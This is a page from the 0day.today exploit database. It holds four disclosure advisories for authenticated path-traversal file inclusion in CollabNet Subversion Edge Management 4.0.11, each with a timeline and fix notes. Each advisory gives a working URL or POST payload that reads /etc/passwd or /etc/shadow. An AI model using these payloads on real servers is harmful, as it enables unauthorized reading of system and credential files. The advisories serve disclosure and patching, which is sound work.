0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

CollabNet Subversion Edge Management 4.0.11 - Local File Inclusion Vulnerability

Author

otr

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

Platform

# Vuln Title: Local file inclusion in CollabNet Subversion Edge Management
# Frontend via logfile "fileName" parameter of the "tail" action
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Local file inclusion
#
# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0
 
Timeline:
 
2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure
 
Summary:
 
The CollabNet Subversion Edge Management Frontend allows authenticated admins to
read arbitrary local files via logfile "fileName" parameter of the "tail" action
 
Vulnerability:
 
  Sample URL:
    https://example.com:4434/csvn/log/tail?fileName=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&startIndex=0
 
Fix proposal:
 
Remove feature or santizes the fileName parameter so that no path traversals and
arbitrary file inclusions are possible.
 
Vendor fix:
 
[...] now allow only showing hooks/logs within the intended directories.
 
####################################################################
 
# Vuln Title: Local file inclusion in CollabNet Subversion Edge Management
# Frontend via logfile "listViewItem" parameter of the "index" action
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Local file inclusion
#
# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0
 
Timeline:
 
2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure
 
Summary:
 
The CollabNet Subversion Edge Management Frontend allows authenticated admins to
read arbitrary local files via logfile "listViewItem" parameter of the "index"
action
 
Vulnerability:
 
  Request:
    POST /csvn/repo/index HTTP/1.1
    Host: example.com:4434
    [...]
 
    id=1&datatable_length=10&listViewItem_../../../../../../etc/passwd=on&_confirmDialogText_copyHook=&_confirmDialogText_renameHook=&_action_downloadHook=Download
 
  Response:
 
    HTTP/1.1 200 OK
    Content-Type: text/plain
    Content-disposition: attachment;filename="../../../../../../etc/passwd"
    Content-Length: 1825
 
    root:x:0:0:root:/root:/bin/bash
 
Fix proposal:
 
Remove feature or santizes the "listViewItem" parameter so that no path traversals and
arbitrary file inclusions are possible.
 
Vendor fix:
 
[...] now allow only showing hooks/logs within the intended directories.
 
####################################################################
 
# Vuln Title: Local file inclusion in CollabNet Subversion Edge Management
# Frontend via "fileName" parameter of the show action
#
# Date: 10.10.2014
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Local file inclusion
#
# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0
 
Timeline:
 
2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure
 
Summary:
 
The CollabNet Subversion Edge Management Frontend allows authenticated admins to
read arbitrary local files via logfile "fileName" parameter of the show action
 
Vulnerability:
 
  Request:
    GET /csvn/log/show?fileName=../../../../../../etc/shadow HTTP/1.1
    Host: example.com:4434
 
  Response:
    HTTP/1.1 200 OK
    [...]
    <div class="span3">../../../../../../etc/passwd</div>
    [...]
    root:x:0:0:root:/root:/bin/bash
 
Fix proposal:
 
Remove feature or santizes the fileName parameter so that no path traversals and
arbitrary file inclusions are possible.
 
Vendor fix:
 
[...] now allow only showing hooks/logs within the intended directories.
 
####################################################################
 
# Vuln Title: Local file inclusion in CollabNet Subversion Edge Management
# Frontend via logfile "filename" parameter of the "downloadHook" action
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Local file inclusion
#
# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0
 
Timeline:
 
2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure
 
Summary:
 
The CollabNet Subversion Edge Management Frontend allows authenticated admins to
read arbitrary local files via logfile "filename" parameter of the
"downloadHook" action
 
Vulnerability:
 
  Example URL:
    https://example.com:4434/csvn/repo/downloadHook/1?filename=../../../../../../etc/passwd
 
Fix proposal:
 
Remove feature or santizes the "filename" parameter so that no path traversals
and arbitrary file inclusions are possible.
 
Vendor fix:
 
[...] now allow only showing hooks/logs within the intended directories.

#  0day.today [2024-12-26]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

CollabNet Subversion Edge Management 4.0.11 - Local File Inclusion Vulnerability

Report Error

Report Error